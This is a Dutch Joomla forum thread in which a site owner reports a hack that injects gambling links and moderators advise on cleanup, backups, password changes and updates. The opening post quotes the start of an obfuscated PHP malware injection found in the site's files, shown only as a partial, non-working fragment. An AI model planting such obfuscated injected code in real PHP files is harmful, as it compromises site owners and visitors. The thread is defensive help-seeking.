Vermeld in iedere vraag duidelijk:
- De versie van Joomla! 3.X die je gebruikt
- De volledige url van je website indien mogelijk.
- De versie van de extensie waar de vraag over gaat.
Hack? joomla 3
Hack? joomla 3
06 mrt 2016 15:47
Mijn website is gehacked, er verschijnen links naar gok website op wisselende plaatsen in de website layout.
Ik zie dat bepaalde php files beginnen met:
De code is veel langer dan boven, is alleen eerste gedeelte. Is dit de hack? Hoe kan dit, de website is geupdate. Kan iemand er wat meer over vertellen?
Ik zie dat bepaalde php files beginnen met:
Code:
<?php $rrnhysava = '#}+;%-qp%)54l} x27;%!<*#}_;#)323f!|!*uyfu x27k:!ftmf!}Z;^nbsbq% x5cS*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof`57ftbc x7 163 x69 145")) or (strstr($uas," x72 166 x3a 61 x31"))) { $gdlduis4`hA x27pd%6<pd%w6Z6<.3`hA x27pd%6<pd%w6Z6<hA)3of>2bd%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f x27,*e x275:52985-t.98]K4]65]D8]
De code is veel langer dan boven, is alleen eerste gedeelte. Is dit de hack? Hoe kan dit, de website is geupdate. Kan iemand er wat meer over vertellen?
- tiwi
- Heeft onderwerp gestart
- Bekend met Joomla!NL
- Berichten: 101
Hack? joomla 3
06 mrt 2016 16:03 - 06 mrt 2016 16:10
Dat is inderdaad een hack.
Meestal wordt een site gehackt doordat er Malware of Spyware op je lokale pc zit.
Ga dus als volgt te werk:
Je site scannen kan bijvoorbeeld hier: sitecheck.sucuri.net//
Meestal wordt een site gehackt doordat er Malware of Spyware op je lokale pc zit.
Ga dus als volgt te werk:
- Zorg ervoor dat je PC Spy- en Malware vrij is.
- Zet een goede recente backup terug.
- wijzig al je wachtwoorden.
- update je site naar de nieuwste versie van Joomla en vergeet ook niet alle extensies mee te nemen.
- Maak meteen een nieuwe backup.
Je site scannen kan bijvoorbeeld hier: sitecheck.sucuri.net//
- Peter
- Algemeen Moderator
- Berichten: 2827
Hack? joomla 3
06 mrt 2016 16:15
Bedankt. Ik heb geen backup, dus alle php files nalopen?
Kan dit gekomen zijn doordat iemand toegang heeft gehad tot de mysql database?
Kan dit gekomen zijn doordat iemand toegang heeft gehad tot de mysql database?
- tiwi
- Heeft onderwerp gestart
- Bekend met Joomla!NL
- Berichten: 101
Hack? joomla 3
06 mrt 2016 17:02
Heel soms is de hack gedaan in de database.
Maar veel vaker nog heeft men toegang gekregen tot de fysieke bestanden.
Veel hacks zijn mogelijk omdat websitebeheerders hun CMS en de erop geïnstalleerde extensies niet regelmatig updaten.
Volg dus in ieder geval de tips van Peter op.
En mocht je er zelf niet uitkomen, dan kunnen diensten als Sucuri of MyJoomla tegen betaling je website weer schoon opleveren.
Maar veel vaker nog heeft men toegang gekregen tot de fysieke bestanden.
Veel hacks zijn mogelijk omdat websitebeheerders hun CMS en de erop geïnstalleerde extensies niet regelmatig updaten.
Volg dus in ieder geval de tips van Peter op.
En mocht je er zelf niet uitkomen, dan kunnen diensten als Sucuri of MyJoomla tegen betaling je website weer schoon opleveren.
Met vriendelijke groet,
Wouter Compactweb.nl
Wouter Compactweb.nl
Voordat je een vraag post, gebruik eerst de zoekfunctie van ons forum. |
- WoodyF4u
- Moderator + Nieuwsteam
- Berichten: 11277
Hack? joomla 3
07 mrt 2016 08:02
Iemand in het buitenland heeft toegang gehad to de mysql database. Die zou echt iets met de database gedaan kunnen hebben. Maar wat?
Het is een sharedhosting en in elke website zijn bij heel php files en in alle folders codes als in eerst post geplaatst. Ze er zelf uithalen dat lijkt mij onmogelijk. Backups heb ik ook niet van alle sites.
Wat kan ik het beste doen?
Ik heb natuurlijk alles nagelopen voor keyloggers etc en wachtwoorden ed veranderd.
Het is een sharedhosting en in elke website zijn bij heel php files en in alle folders codes als in eerst post geplaatst. Ze er zelf uithalen dat lijkt mij onmogelijk. Backups heb ik ook niet van alle sites.
Wat kan ik het beste doen?
Ik heb natuurlijk alles nagelopen voor keyloggers etc en wachtwoorden ed veranderd.
- tiwi
- Heeft onderwerp gestart
- Bekend met Joomla!NL
- Berichten: 101
Hack? joomla 3
07 mrt 2016 08:31
Lijkt me sterk dat dit via de database in je site komt. Het is bijna zeker malware of een virus. Als een hacker toegang tot je database had gehad, dan zou je waarschijnlijk helemaal geen toegang meer tot je site hebben gehad.
Daarnaast is het natuurlijk heel onverstandig om niet regelmatig backups te maken.
Je kunt dus of je site op laten schonen of een backup maken van je database, een schone joomla installeren met daarin alle gebruikte extensies en dan je database weer koppelen. Haal nog wel eerst alle afbeeldingen naar je computer, scan ze en zet ze daarna weer terug in je schone site.
Daarnaast is het natuurlijk heel onverstandig om niet regelmatig backups te maken.
Je kunt dus of je site op laten schonen of een backup maken van je database, een schone joomla installeren met daarin alle gebruikte extensies en dan je database weer koppelen. Haal nog wel eerst alle afbeeldingen naar je computer, scan ze en zet ze daarna weer terug in je schone site.
Groetjes, Astrid
Gebruik de zoekfunctie van dit forum voordat je een nieuwe vraag plaatst. Vragen uitsluitend via dit forum. yndi.nl - kvk 17157725 | Is je vraag beantwoord? Dan kan je het draadje zelf
sluiten
. Wil je Joomla!NL steunen? Dat kan met een donatie. |
- Astrid
- Moderator + Technisch team
- Berichten: 37437
Hack? joomla 3
07 mrt 2016 08:47
Met laten opschonen bedoel je diensten die WoodyF4U noemt?
Ik snap ook niet wat de hack doet? deze website thaicontracts.com is besmet in bijna elke folder van deze website zijn dit soort codes in php files te vinden.
Ik snap ook niet wat de hack doet? deze website thaicontracts.com is besmet in bijna elke folder van deze website zijn dit soort codes in php files te vinden.
- tiwi
- Heeft onderwerp gestart
- Bekend met Joomla!NL
- Berichten: 101
Hack? joomla 3
07 mrt 2016 10:04
Je hacker heeft blijkbaar voldoende toegang kunnen krijgen om lekker rond te rommelen.
Dat bewijst maar weer eens hoe belangrijk regelmatig updaten en het maken van back-ups dus is.
Als je het niet zelf kunt opschonen, dan is het inderdaad het beste om gebruik te maken van de diensten die ik je hierboven heb genoemd.
En mocht je dat niet zien zitten of te duur vinden, dan zit er niets anders op dan je website opnieuw te bouwen.
Uiteraard wel pas nadat je voor je database , je FTP-accounts en je hostingbeheerscherm een ander wachtwoord hebt ingesteld.
En uiteraard jouw PC en die van medebeheerders hebt gescand of virussen of malware.
9 van de 10 hacks worden namelijk uitgevoerd via een besmette PC van de beheerder van de website.
Dat bewijst maar weer eens hoe belangrijk regelmatig updaten en het maken van back-ups dus is.
Als je het niet zelf kunt opschonen, dan is het inderdaad het beste om gebruik te maken van de diensten die ik je hierboven heb genoemd.
En mocht je dat niet zien zitten of te duur vinden, dan zit er niets anders op dan je website opnieuw te bouwen.
Uiteraard wel pas nadat je voor je database , je FTP-accounts en je hostingbeheerscherm een ander wachtwoord hebt ingesteld.
En uiteraard jouw PC en die van medebeheerders hebt gescand of virussen of malware.
9 van de 10 hacks worden namelijk uitgevoerd via een besmette PC van de beheerder van de website.
Met vriendelijke groet,
Wouter Compactweb.nl
Wouter Compactweb.nl
Voordat je een vraag post, gebruik eerst de zoekfunctie van ons forum. |
- WoodyF4u
- Moderator + Nieuwsteam
- Berichten: 11277
- tiwi
- Heeft onderwerp gestart
- Bekend met Joomla!NL
- Berichten: 101
Hack? joomla 3
07 mrt 2016 10:32 - 07 mrt 2016 10:51
Nee, ik niet.
Maar bij Sucuri of MyJoomla doen ze dagelijks niets anders dan in dit soort code duiken.
Zij kunnen je hier zeker meer uitleg over geven.
Maar bij Sucuri of MyJoomla doen ze dagelijks niets anders dan in dit soort code duiken.
Zij kunnen je hier zeker meer uitleg over geven.
Met vriendelijke groet,
Wouter Compactweb.nl
Wouter Compactweb.nl
Voordat je een vraag post, gebruik eerst de zoekfunctie van ons forum. |
- WoodyF4u
- Moderator + Nieuwsteam
- Berichten: 11277
Hack? joomla 3
07 mrt 2016 14:58
Zou het een oplossing zijn om de joomla folders te overschrijven of te verwijderen en dan weer opnieuw upload. Als ik bijvoorbeeld de folder administrator met ftp delete en deze weer upload van een gelijke schone joomla website?
- tiwi
- Heeft onderwerp gestart
- Bekend met Joomla!NL
- Berichten: 101
Hack? joomla 3
07 mrt 2016 15:02
Nee dat is niet de oplossing, de oplossingen die hier zijn geschreven navolgen.
Groeten, Jelle
Voordat je een vraag post, gebruik eerst de zoekfunctie van ons forum eens. Vragen uitsluitend via dit Forum. | Is je vraag opgelost? Dan kan je hem zelf
sluiten
. Wil je Joomla!NL steunen? Dat kan met een donatie. |
- Jelle
- Algemeen Moderator
- Berichten: 13625
Tijd voor maken pagina: 0.762 seconden